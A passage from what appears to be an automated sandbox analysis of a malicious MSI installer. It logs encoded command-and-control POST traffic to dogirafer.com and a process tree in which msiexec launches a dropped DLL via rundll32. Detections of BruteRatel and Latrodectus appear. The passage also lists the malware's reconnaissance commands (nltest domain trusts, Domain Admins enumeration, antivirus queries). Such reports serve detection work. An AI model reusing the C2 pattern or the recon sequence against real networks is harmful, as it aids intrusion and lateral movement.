150MiyURsC624pnYhnZjWPjg3FHMkzUDCDCavi1vy7KbGmcphSGpB6yiJiVjA1oJUUsfprm7FkqC7S7tKVGtJSroMg9giVXG2tP5sHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FMo4AO7mKXMVaLfGeHFh449A7FveAXZDgkE5NFsMcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvVURp
2024-12-02 17:42:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50052	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:56 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:57 UTC	787	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5WvGu%2FE%2BNeibdKgc%2BKqk0DXrOA5575q21zP%2FFjzMXHfTYiAFQp%2FDj9MCdL1SxkaA2xnD2F24uWtXaneEGw7QxS7kCozfIWCZrRBQEiKUtiostOfZTIZWpvmYnVv6mpA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1dcc3ed1426a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2115&min_rtt=2110&rtt_var=795&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1383886&cwnd=223&unsent_bytes=0&cid=65253f5d2fbc056d&ts=1634&x=0"
2024-12-02 17:42:57 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 2b 62 51 73 4f 79 32 6f 70 69 59 52 6e 52 68 32 65 73 78 33 4a 4d 4f 30 4c 65 44 45 36 6b 5a 2f 61 37 74 79 2b 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 75 44 42 70 49 6b 41 70 66 76 7a 67 67 46 77 72 44 72 53 35 2f 61 67 4f 75 70 53 74 70 4d 35 52 37 69 68 64 48 6d 4a 46 35 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 46 46 4d 38 33 41 2b 7a 6b 54 68 34 52 61 4c 44 47 65 33 68 68 34 6f 35 45 36 31 4c 56 43 33 5a 48 67 55 6f 2f 4d 56 49 4d 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 2f 52 51 52 70 Data Ascii: 150Py+bQsOy2opiYRnRh2esx3JMO0LeDE6kZ/a7ty+AWB/S4BKLswqykcfTuDBpIkApfvzggFwrDrS5/agOupStpM5R7ihdHmJF54+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzFFM83A+zkTh4RaLDGe3hh4o5E61LVC3ZHgUo/MVIMcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZO/RQRp
2024-12-02 17:42:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50053	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:59 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:43:00 UTC	783	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:43:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EkogLl4Zzi%2FnJ7zBwzdUl9cUfvl66HWBOOnFV%2B7jetrC2QBooz0FbS3KI7govDDL6ARfJ%2BcNQU5kJQQdia0Z91KJeonksYXbjCdlnPPVIU5SDHp1ZN2UCz567v0yrKa6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1dde8830de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1468&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1936339&cwnd=230&unsent_bytes=0&cid=216cea7f0f6f73dc&ts=1586&x=0"
2024-12-02 17:43:00 UTC	339	IN	Data Raw: 31 34 63 0d 0a 50 53 75 5a 51 63 57 33 30 49 70 75 5a 78 37 62 68 47 4c 68 67 33 52 4e 50 30 33 56 41 69 58 43 62 76 32 33 74 79 4c 4e 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 4a 30 38 73 65 5a 62 6c 37 46 63 6d 43 37 43 2b 73 4b 5a 47 73 4a 61 74 70 4d 38 32 67 69 5a 54 47 6d 4a 4c 37 73 44 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 38 6b 7a 41 4f 76 68 4b 58 4d 56 62 37 54 45 65 48 51 76 71 34 5a 44 35 31 4c 56 43 68 6f 70 68 55 67 37 4d 6c 73 4c 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 66 52 61 54 35 Data Ascii: 14cPSuZQcW30IpuZx7bhGLhg3RNP03VAiXCbv23tyLNY2mcphSGpB6yiJiVjA1vJ08seZbl7FcmC7C+sKZGsJatpM82giZTGmJL7sDsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4G8kzAOvhKXMVb7TEeHQvq4ZD51LVChophUg7MlsLcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOfRaT5
2024-12-02 17:43:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50054	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:43:02 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:43:03 UTC	784	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TF9rgLukpwDzjnCj%2FrVMfXpzu0eksORMpTMy5wKqoXnFr1X2obXFZ%2Bsh5k6DPyxVoRY8zYURB9nDBDeUyQQqARQbxMKSoe6IS92jUPhaQr9jcUnZ%2BUF59jOC7sLulLYp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1df119e55401-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14222&min_rtt=14214&rtt_var=5346&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=204496&cwnd=32&unsent_bytes=0&cid=a70865752b5ff5d5&ts=1647&x=0"
2024-12-02 17:43:03 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 69 36 66 51 4d 4b 78 30 59 70 76 5a 52 58 66 6a 47 58 70 67 33 56 4f 4f 30 37 66 44 43 50 43 61 76 69 30 75 69 58 4d 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4c 30 41 70 65 5a 4f 4f 69 6c 6f 6b 43 62 61 38 2f 61 67 44 73 4a 71 6e 72 63 6c 52 36 79 4e 57 47 6d 46 49 36 59 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 42 46 73 6b 31 41 4f 76 69 54 68 73 52 61 4c 37 48 65 6e 6c 68 35 49 46 48 35 6c 44 5a 43 58 5a 42 67 30 73 36 4d 56 31 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 68 4f 76 5a 62 52 35 Data Ascii: 150Mi6fQMKx0YpvZRXfjGXpg3VOO07fDCPCavi0uiXMY2mcphSGpB6yiJiVjA1mL0ApeZOOilokCba8/agDsJqnrclR6yNWGmFI6Y+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzBFsk1AOviThsRaL7Henlh5IFH5lDZCXZBg0s6MV1EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbhOvZbR5
2024-12-02 17:43:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:38:58
Start date:	02/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\zdi.txt.msi"
Imagebase:	0x7ff7106e0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:38:58
Start date:	02/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7106e0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:38:59
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1
Imagebase:	0xdf0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:38:59
Start date:	02/12/2024
Path:	C:\Windows\Installer\MSI48D4.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump
Imagebase:	0xc10000
File size:	399'328 bytes
MD5 hash:	B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:38:59
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Imagebase:	0x340000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:38:59
Start date:	02/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Imagebase:	0x7ff780620000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:39:36
Start date:	02/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c ipconfig /all
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff6f5bb0000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c systeminfo
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff60a190000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:41:05
Start date:	02/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff61eba0000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts /all_trusts
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff61eba0000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all /domain
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:41:06
Start date:	02/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff6eb750000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:41:19
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:41:19
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:41:19
Start date:	02/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all
Imagebase:	0x7ff6eb750000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:41:31
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net group "Domain Admins" /domain
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:41:31
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:41:31
Start date:	02/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net group "Domain Admins" /domain
Imagebase:	0x7ff6eb750000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:41:31
Start date:	02/12/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 group "Domain Admins" /domain
Imagebase:	0x7ff63e1e0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:41:31
Start date:	02/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Imagebase:	0x7ff6b3de0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:41:31
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:41:32
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net config workstation
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:41:32
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:41:32
Start date:	02/12/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net config workstation
Imagebase:	0x7ff6eb750000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:41:32
Start date:	02/12/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 config workstation
Imagebase:	0x7ff63e1e0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:41:33
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:41:33
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:41:33
Start date:	02/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Imagebase:	0x7ff6b3de0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	12:41:33
Start date:	02/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /V /B /C:displayName
Imagebase:	0x7ff637180000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	12:41:34
Start date:	02/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c whoami /groups
Imagebase:	0x7ff651f90000
File size:	289'792 bytes
